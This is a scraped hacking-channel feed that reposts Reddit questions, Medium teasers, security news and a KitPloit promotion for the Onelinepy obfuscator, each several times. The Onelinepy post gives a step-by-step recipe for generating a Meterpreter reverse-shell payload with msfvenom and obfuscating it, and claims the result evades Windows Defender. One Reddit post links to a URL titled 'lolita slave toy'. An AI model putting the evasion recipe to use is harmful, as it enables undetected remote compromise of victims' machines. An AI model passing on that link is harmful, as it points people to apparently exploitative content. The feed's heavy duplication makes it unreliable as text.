Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
PG — InfoSecPrep— Walkthrough (Offensive Security Proving Grounds Play Boxes)
https://cdn-images-1.medium.com/max/600/1*CpRci7aZzS9dwIF5_iONMw.png
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
PG — InfoSecPrep— Walkthrough (Offensive Security Proving Grounds Play Boxes)
https://cdn-images-1.medium.com/max/600/1*CpRci7aZzS9dwIF5_iONMw.png
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
PG — InfoSecPrep— Walkthrough (Offensive Security Proving Grounds Play Boxes)
This article aims to walk you through InfoSecPrep box, produced by FalconSpy and hosted on Offensive Security’s Proving Grounds Labs. Anyone who has access to Vulnhub and Offensive Security’s Proving…
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
http://1.bp.blogspot.com/-jw8jWQoV5V0/YLbiRly2YYI/AAAAAAAAWu8/kkvvuvmhjGAJDs8U278c-vnSC2z93LVdQCK4BGAYYCw/s16000/onelinepy_1_oneline-710961.png
Python Obfuscator To Generate One-Liners And FUD Payloads.
Download & Run
Usage Guide
Example: Creating FUD Meterpreter Python Payload
1. Generate Python Payload:
1. Obfustucate Payload
1. Profit! The Obfustucated Payload works against Windows Defender.
More Examples
Obfustucation Method List
Download Onelinepy
___________________________
@hacking_Attack
@Hacking_Video
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
http://1.bp.blogspot.com/-jw8jWQoV5V0/YLbiRly2YYI/AAAAAAAAWu8/kkvvuvmhjGAJDs8U278c-vnSC2z93LVdQCK4BGAYYCw/s16000/onelinepy_1_oneline-710961.png
Python Obfuscator To Generate One-Liners And FUD Payloads.
Download & Run
git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepyUsage Guide
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
usage: oneline.py [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT]
optional arguments:
-h, --help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
--script SCRIPT File path of Python file to Obfustucate.
--code CODE Python code to Obfustucate.
--list List Obfustucating Methods.
--output OUTPUT Output File.
Example: Creating FUD Meterpreter Python Payload
1. Generate Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt1. Obfustucate Payload
onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt1. Profit! The Obfustucated Payload works against Windows Defender.
More Examples
onelinepy -m /one_line/base64 --script payload.py -i 3onelinepy -m /one_line/hex --code "print('HEX!')"Obfustucation Method List
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
Obfustucators ( * = May cause Syntax Errors )
-=============-
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhiddenDownload Onelinepy
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
Deep Web
Are “living dolls” real on the dark web? Or is this another myth?
I’m a horror movie fan and I frequent horror blogs. Today one i follow uploaded an article on “living dolls” — sad human experiments supposedly come off of the dark web. He even attached some pictures - I’ll link below, to the blog - a little nsfw.
I’m in no way an expert so I thought I’d ask - are these stories/images real? Or are they more urban myths? I’m pretty freaked out, even for a horror fan, haha.
Link : https://forum.horrorstab.com/forums/argomento/il-post-di-lolita-slave-toy/
submitted by /u/thr0waway131218
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Are “living dolls” real on the dark web? Or is this another myth?
I’m a horror movie fan and I frequent horror blogs. Today one i follow uploaded an article on “living dolls” — sad human experiments supposedly come off of the dark web. He even attached some pictures - I’ll link below, to the blog - a little nsfw.
I’m in no way an expert so I thought I’d ask - are these stories/images real? Or are they more urban myths? I’m pretty freaked out, even for a horror fan, haha.
Link : https://forum.horrorstab.com/forums/argomento/il-post-di-lolita-slave-toy/
submitted by /u/thr0waway131218
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
reddit.com: over 18?
Reddit gives you the best of the internet in one place. Get a constantly updating feed of breaking news, fun stories, pics, memes, and videos just for you. Passionate about something niche? Reddit has thousands of vibrant communities with people that share…
Deep Web
red room
I’m sure everybody been hearing about this is the red room real or it’s just some myth people made ?
submitted by /u/Carefull_eater
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
red room
I’m sure everybody been hearing about this is the red room real or it’s just some myth people made ?
submitted by /u/Carefull_eater
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
red room
I’m sure everybody been hearing about this is the red room real or it’s just some myth people made ?
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
Python Obfuscator To Generate One-Liners And FUD Payloads.Download & Run git clone https://github.com/spicesouls/onelinepycd onelinepychmod +x setup.sh./setup.shonelinepy Usage Guide _ _ _ _ _| |_|_ _ _ _ _ | . | | -_| | | | -_| . | | | Python |_|_|_|_|_|_|_|_|_| _|_ | Obfustucator |_| |_|usage: oneline.py -h -m M -i I --script SCRIPT --code CODE --list --output OUTPUToptional arguments: -h, --help show this help message and exit -m M Obfustucating Method (i.e, -m /oneline/base64) -i I Iterations For Obfustucation. --script SCRIPT File path of Python file to Obfustucate. --code CODE Python code to Obfustucate. --list List Obfustucating Methods. --output OUTPUT Output File. Example: Creating FUD Meterpreter Python Payload Generate Python Payload: msfvenom --payload python/meterpreter\reverse_http LHOST=... LPORT=... > payload.txt Obfustucate Payload onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt Profit! The Obfustucated Payload works against Windows Defender. More Examples onelinepy -m /one_line/base64 --script payload.py -i 3 onelinepy -m /one_line/hex --code "print('HEX!')" Obfustucation Method List _ _ _ _ _| |_|_ _ _ _ _ | . | | -_| | | | -_| . | | | Python |_|_|_|_|_|_|_|_|_| _|_ | Obfustucator |_| |_| Obfustucators ( * = May cause Syntax Errors ) -=============- 0 /one_line/hex 1 /one_line/base64 2 /one_line/base32 3 /one_line/gunzip* 4 /one_line/rot13* 5 /cmd/command 6 /cmd/powershell 7 /cmd/powershellhidden Download Onelinepy
Read more...
___________________________
@hacking_Attack
@Hacking_Video
Python Obfuscator To Generate One-Liners And FUD Payloads.Download & Run git clone https://github.com/spicesouls/onelinepycd onelinepychmod +x setup.sh./setup.shonelinepy Usage Guide _ _ _ _ _| |_|_ _ _ _ _ | . | | -_| | | | -_| . | | | Python |_|_|_|_|_|_|_|_|_| _|_ | Obfustucator |_| |_|usage: oneline.py -h -m M -i I --script SCRIPT --code CODE --list --output OUTPUToptional arguments: -h, --help show this help message and exit -m M Obfustucating Method (i.e, -m /oneline/base64) -i I Iterations For Obfustucation. --script SCRIPT File path of Python file to Obfustucate. --code CODE Python code to Obfustucate. --list List Obfustucating Methods. --output OUTPUT Output File. Example: Creating FUD Meterpreter Python Payload Generate Python Payload: msfvenom --payload python/meterpreter\reverse_http LHOST=... LPORT=... > payload.txt Obfustucate Payload onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt Profit! The Obfustucated Payload works against Windows Defender. More Examples onelinepy -m /one_line/base64 --script payload.py -i 3 onelinepy -m /one_line/hex --code "print('HEX!')" Obfustucation Method List _ _ _ _ _| |_|_ _ _ _ _ | . | | -_| | | | -_| . | | | Python |_|_|_|_|_|_|_|_|_| _|_ | Obfustucator |_| |_| Obfustucators ( * = May cause Syntax Errors ) -=============- 0 /one_line/hex 1 /one_line/base64 2 /one_line/base32 3 /one_line/gunzip* 4 /one_line/rot13* 5 /cmd/command 6 /cmd/powershell 7 /cmd/powershellhidden Download Onelinepy
Read more...
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Hackaday's Satellite Communications Hack Chat
This topic seems timely. I couldn't attend, sadly. However, the transcript is available here and I plan to read it. Hopefully it's as interesting as it sounds.
submitted by /u/redrosesburningblack
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hackaday's Satellite Communications Hack Chat
This topic seems timely. I couldn't attend, sadly. However, the transcript is available here and I plan to read it. Hopefully it's as interesting as it sounds.
submitted by /u/redrosesburningblack
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hackaday's Satellite Communications Hack Chat
This topic seems timely. I couldn't attend, sadly. However, the transcript is [available here](https://hackaday.io/messages/room/2369) and I plan...
hacking: security in practice
Confinscated laptop was returned. Is it safe to open, unlock & use without restoring?
I'm not going to go into great detail about the situation but my laptop which has Ubuntu Linux installed on it with an encrypted hard-drive was confiscated by police a couple moths ago because I was a suspect in an investigation. I was cleared and my laptop returned but I'm reluctant to trust the police on anything regarding my right to privacy at this point. I'm 100% certain they weren't able to get into it and thats why it has been returned but not my phone yet. I'm not worried of them finding anything related to what they are investigating but I want to keep my privacy. Basically I'm wondering, if I power on the laptop, unlock it and start using it again, is it possible they've bugged it or something similar? Like could they have done something to it without unencrypting the hard-drive? Or am I better off just reinstalling Linux from scratch and taking the loss on my files?
submitted by /u/P1nealPower
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Confinscated laptop was returned. Is it safe to open, unlock & use without restoring?
I'm not going to go into great detail about the situation but my laptop which has Ubuntu Linux installed on it with an encrypted hard-drive was confiscated by police a couple moths ago because I was a suspect in an investigation. I was cleared and my laptop returned but I'm reluctant to trust the police on anything regarding my right to privacy at this point. I'm 100% certain they weren't able to get into it and thats why it has been returned but not my phone yet. I'm not worried of them finding anything related to what they are investigating but I want to keep my privacy. Basically I'm wondering, if I power on the laptop, unlock it and start using it again, is it possible they've bugged it or something similar? Like could they have done something to it without unencrypting the hard-drive? Or am I better off just reinstalling Linux from scratch and taking the loss on my files?
submitted by /u/P1nealPower
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Confinscated laptop was returned. Is it safe to open, unlock & use...
I'm not going to go into great detail about the situation but my laptop which has Ubuntu Linux installed on it with an encrypted hard-drive was...
hacking: security in practice
zip2john
what is the meaning of 'proceeding with incremental:ascii'?
submitted by /u/One-Ad-9971
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
zip2john
what is the meaning of 'proceeding with incremental:ascii'?
submitted by /u/One-Ad-9971
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
zip2john
what is the meaning of 'proceeding with incremental:ascii'?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Phishing Emails Remain in User Inboxes Over 3 Days Before They're Removed
Most malicious emails get blocked, but the ones that get through linger around dangerously long, a new study shows.
___________________________
@hacking_Attack
@Hacking_Video
Phishing Emails Remain in User Inboxes Over 3 Days Before They're Removed
Most malicious emails get blocked, but the ones that get through linger around dangerously long, a new study shows.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Phishing Emails Remain in User Inboxes Over 3 Days Before They're Removed
Most malicious emails get blocked, but the ones that get through linger around dangerously long, a new study shows.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The Meat Hack
https://cdn-images-1.medium.com/max/1500/1*kXaBbDU32kdQMViUrjbKtg.jpeg
Less than a month after the Colonial Pipeline was hit with one of the most disruptive ransomware attacks in history, JBS — the world’s…
Continue reading on Digital Diplomacy »
___________________________
@hacking_Attack
@Hacking_Video
The Meat Hack
https://cdn-images-1.medium.com/max/1500/1*kXaBbDU32kdQMViUrjbKtg.jpeg
Less than a month after the Colonial Pipeline was hit with one of the most disruptive ransomware attacks in history, JBS — the world’s…
Continue reading on Digital Diplomacy »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The Meat Hack
Less than a month after the Colonial Pipeline was hit with one of the most disruptive ransomware attacks in history, JBS — the world’s…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe Write-up: VulnNet Internal
https://cdn-images-1.medium.com/max/600/1*y2DD9NfWQyN159At6safrQ.png
Hoy vamos a intentar vulnerar esta nueva máquina de TryHackMe llamada VulnNet Internal del autor TheCyb3rW0lf.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe Write-up: VulnNet Internal
https://cdn-images-1.medium.com/max/600/1*y2DD9NfWQyN159At6safrQ.png
Hoy vamos a intentar vulnerar esta nueva máquina de TryHackMe llamada VulnNet Internal del autor TheCyb3rW0lf.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe Write-up: VulnNet Internal
Hoy vamos a intentar vulnerar esta nueva máquina de TryHackMe llamada VulnNet Internal del autor TheCyb3rW0lf.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The Official Future MERCH of ZEUS!
https://cdn-images-1.medium.com/max/816/1*eVXg6oyeV-35AusYYQRLNA.jpeg
[ ZEUS T-Shirts / Hoodies / Tank Tops ]
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
The Official Future MERCH of ZEUS!
https://cdn-images-1.medium.com/max/816/1*eVXg6oyeV-35AusYYQRLNA.jpeg
[ ZEUS T-Shirts / Hoodies / Tank Tops ]
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The Official Future MERCH of ZEUS!
[ ZEUS T-Shirts / Hoodies / Tank Tops ]